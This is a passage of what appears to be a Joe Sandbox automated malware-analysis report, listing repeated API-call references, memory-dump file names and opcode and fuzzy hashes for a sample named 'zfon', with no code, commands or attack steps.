                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F8CCE
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F8CDE
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F8CEE
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F8CFB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                • Opcode ID: efd3d99e0a51efc82058e2233da9612c38963ae01040c96e8f0411da84b97f61
                                                                                                • Instruction ID: c86565a3eff2e71cb8440a1ddd9ef7e04e33e924e2a8b9f96744a5a7c79ddc60
                                                                                                • Opcode Fuzzy Hash: efd3d99e0a51efc82058e2233da9612c38963ae01040c96e8f0411da84b97f61
                                                                                                • Instruction Fuzzy Hash: 9AF06260D0A54761F74CBFA5BC5C278A1769F447B6F800A39C63F019DCEE5C25C511B0
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F96F8F93), ref: 00007FF7F96F9973
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F96F8F93), ref: 00007FF7F96F998F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F96F8F93), ref: 00007FF7F96F999F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F96F8F93), ref: 00007FF7F96F99AF
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F96F8F93), ref: 00007FF7F96F99BC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                • Opcode ID: 0a558ddb4e7029915ba6baf9eb4b52181b74cb87701a1e4e30068ed0fff62220
                                                                                                • Instruction ID: 6b7b83f081ba3673c0ec7da4ff1c19994e32b2fbd134326dc6dacde15e16c3b4
                                                                                                • Opcode Fuzzy Hash: 0a558ddb4e7029915ba6baf9eb4b52181b74cb87701a1e4e30068ed0fff62220
                                                                                                • Instruction Fuzzy Hash: 78F0E1A0E0960765EB98BF57BD4C328A1769F047F2F950835C23D417DCED5C658542B3
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F971DE03
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F971DE1F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F971DE2F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F971DE3F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F971DE4C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                • Opcode ID: 5821015ce4819945f0a8bc57dc87e425e76cdc1b5b383618c374124c9746fd65
                                                                                                • Instruction ID: c05303ba973c068f3d5fd46a00fd06debe8f8f1374e3ecfb65ccba8c59f9eb52
                                                                                                • Opcode Fuzzy Hash: 5821015ce4819945f0a8bc57dc87e425e76cdc1b5b383618c374124c9746fd65
                                                                                                • Instruction Fuzzy Hash: F5F01260E0C306E5EA48BF56BC4C22891719B18BF2F800435C12D816DCDE5C25CD8A73
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F972C0B3
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F972C0CF
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F972C0DF
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F972C0EF
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F972C0FC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                • Opcode ID: f6d4627fd98ba14bac13975c10f1fb685cbe1d88eedefbfb9420bcdc66ef4efb
                                                                                                • Instruction ID: f7192722fa6c26be6983130ced255d782c1602e98b1e09f577aca2094ab07273
                                                                                                • Opcode Fuzzy Hash: f6d4627fd98ba14bac13975c10f1fb685cbe1d88eedefbfb9420bcdc66ef4efb
                                                                                                • Instruction Fuzzy Hash: 66F08CB0E18307A4EB58BF55AC4C268A1F1DF187E2F840831C52D02ADCCE4C65C986B1
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F96F8F13), ref: 00007FF7F96F98F3
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F96F8F13), ref: 00007FF7F96F990F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F96F8F13), ref: 00007FF7F96F991F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F96F8F13), ref: 00007FF7F96F992F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F96F8F13), ref: 00007FF7F96F993C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                • Opcode ID: 2fb25108f35d941593c22e25bba104b268c97b58bb64699d526f95c43bc25dae
                                                                                                • Instruction ID: d8a35e6130d70f885ef3895c806f533e46bdcb730b3d735421713d8996887aec
                                                                                                • Opcode Fuzzy Hash: 2fb25108f35d941593c22e25bba104b268c97b58bb64699d526f95c43bc25dae
                                                                                                • Instruction Fuzzy Hash: 03F031B0E0820665EB48BF55AD4D328A1F69F047F6F844835C23D01BDCFD5C65C582B1
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F9711C43
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F9711C5F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F9711C6F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F9711C7F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F9711C8C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                • Opcode ID: 16132b1b97e4afbb32a3792d560562ac31cb19e7eff60c65a0afaa5d06987951
                                                                                                • Instruction ID: e2ed563ddd300b81c14ae01b85888b5502b3b5fa464d6db4f9b91e02b32454ff
                                                                                                • Opcode Fuzzy Hash: 16132b1b97e4afbb32a3792d560562ac31cb19e7eff60c65a0afaa5d06987951
                                                                                                • Instruction Fuzzy Hash: AEF0ECA0E09707A5EB6CBF55AC8C338A1769F087F2F904A35C13D06AECDE5C65C582B1
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F9727A8D), ref: 00007FF7F9727C63
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F9727A8D), ref: 00007FF7F9727C7F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F9727A8D), ref: 00007FF7F9727C8F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F9727A8D), ref: 00007FF7F9727C9F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F9727A8D), ref: 00007FF7F9727CAC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                • Opcode ID: 1e1325763c204f614580ca28e882b4561ce590b6f5d7c437e7bbf9f77bbfad6d
                                                                                                • Instruction ID: f5be4344f8d43bf3a0278066ef17a319ca5b1e1ee9ab28195ec14777ffc1fadb
                                                                                                • Opcode Fuzzy Hash: 1e1325763c204f614580ca28e882b4561ce590b6f5d7c437e7bbf9f77bbfad6d
                                                                                                • Instruction Fuzzy Hash: 5FF01DA0E1860664EB48BF64AD4C268A269DF097F2F900A34C13D116ECDD5C35C546B1
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E4403
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E441B
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E442B
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E443B
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E4448
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                • Opcode ID: 72e217726392643e79e687100b577b01b41de6d779231d9bfbbd7ee5620b34e1
                                                                                                • Instruction ID: 2c957904416cbf23e84a89e5758a1b31473990e34879230f892f505bb2377d50
                                                                                                • Opcode Fuzzy Hash: 72e217726392643e79e687100b577b01b41de6d779231d9bfbbd7ee5620b34e1
                                                                                                • Instruction Fuzzy Hash: F9F044A0F08207A5EB4CBF64AD4C228B176DF447F2F900A35C23D02ADCDD5D25D54276
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96EA623
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96EA63F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96EA64F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96EA65F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96EA66C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                • Opcode ID: fc2c3111614c86b3978751517b6eb494c7d1032bfecd94e764b9329ffff241ad
                                                                                                • Instruction ID: ef600839b447c5865f05d943d7509bd0f69b9d3b80274f900f8e5cd528c8697d
                                                                                                • Opcode Fuzzy Hash: fc2c3111614c86b3978751517b6eb494c7d1032bfecd94e764b9329ffff241ad
                                                                                                • Instruction Fuzzy Hash: 39F04FA0E0820769EB8CBF54BD4C338A2769F097F2F804A34C13D02AECDD5D258586B6
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F97215A3
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F97215BC
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F97215CC
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F97215DC
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F97215E9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                • Opcode ID: 3f681eb5713a892da424ea5b97dc0341e4c877ef2987a9e861528f4583824885
                                                                                                • Instruction ID: 6ff8cf6f6da102270e7ed7056c887cb6adc56ecf765ddc061d22e3eaa7ec2853
                                                                                                • Opcode Fuzzy Hash: 3f681eb5713a892da424ea5b97dc0341e4c877ef2987a9e861528f4583824885
                                                                                                • Instruction Fuzzy Hash: 49F03CE0D1934768EBA8BF56BC4C269A171EF0D7F2F800A34C13E019DC9D5C248646B1
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F97092EA
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F97092FF
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F970930F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F970931F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F970932C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                • Opcode ID: 7402652a24f6ac2342940f10915b9c3fc5835fbb4437735f00c634805102aa82
                                                                                                • Instruction ID: b5650904114b5f20df202889871b522ac059fb77b13aed1df0b034173f853db1
                                                                                                • Opcode Fuzzy Hash: 7402652a24f6ac2342940f10915b9c3fc5835fbb4437735f00c634805102aa82
                                                                                                • Instruction Fuzzy Hash: CDF0F4A0E08607A8EB8CBF95AC8D238E1629F087F2F804A35C23D029EC9F5C24D545B1
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F9702D11), ref: 00007FF7F970927A
